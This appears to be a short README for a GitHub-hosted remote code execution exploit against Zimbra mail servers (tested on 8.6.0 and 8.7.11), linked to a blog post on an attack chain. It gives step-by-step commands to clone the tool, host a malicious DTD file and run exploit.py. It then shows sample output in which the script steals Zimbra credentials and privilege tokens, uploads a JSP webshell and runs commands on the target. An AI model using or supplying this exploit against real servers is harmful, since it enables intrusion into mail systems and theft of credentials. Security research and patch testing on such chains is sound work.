RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0, 8.7.11
$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py
$ ./exploit.py
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX
[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX
[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX
[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp
webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$